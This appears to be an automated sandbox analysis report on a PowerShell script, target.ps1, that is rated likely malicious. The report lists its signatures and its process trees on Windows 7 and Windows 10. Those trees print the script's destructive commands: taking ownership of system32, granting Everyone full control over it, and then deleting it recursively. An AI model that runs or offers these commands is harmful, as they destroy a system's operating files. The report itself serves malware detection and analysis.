Analysis Overview
SHA256
62d604ff166eaf684234beb15a3d6ac29311eeaad23f3d5ad622d60e6486b4c9
Threat Level: Likely malicious
The file target.ps1 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies file permissions
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 20:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 20:38
Reported
2024-08-09 20:41
Platform
win7-20240708-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "takeown /f %windir%\system32\* >nul"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "icacls %windir%\system32\* /grant Everyone:(F) >nul"
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\* /grant Everyone:(F)
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "del /s /q %windir%\system32\* >nul"
Network
Files
memory/1976-4-0x000007FEF61FE000-0x000007FEF61FF000-memory.dmp
memory/1976-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/1976-6-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
memory/1976-7-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/1976-8-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
memory/1976-9-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
memory/1976-10-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
memory/1976-11-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
memory/1976-12-0x000007FEF5F40000-0x000007FEF68DD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 20:38
Reported
2024-08-09 20:41
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "takeown /f %windir%\system32\* >nul"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "icacls %windir%\system32\* /grant Everyone:(F) >nul"
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\* /grant Everyone:(F)
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "del /s /q %windir%\system32\* >nul"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/4888-0-0x00007FFDF2643000-0x00007FFDF2645000-memory.dmp
memory/4888-1-0x00000208F09E0000-0x00000208F0A02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5t1fjh1r.aob.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4888-11-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp
memory/4888-12-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp
memory/4888-15-0x00007FFDF2640000-0x00007FFDF3101000-memory.dmp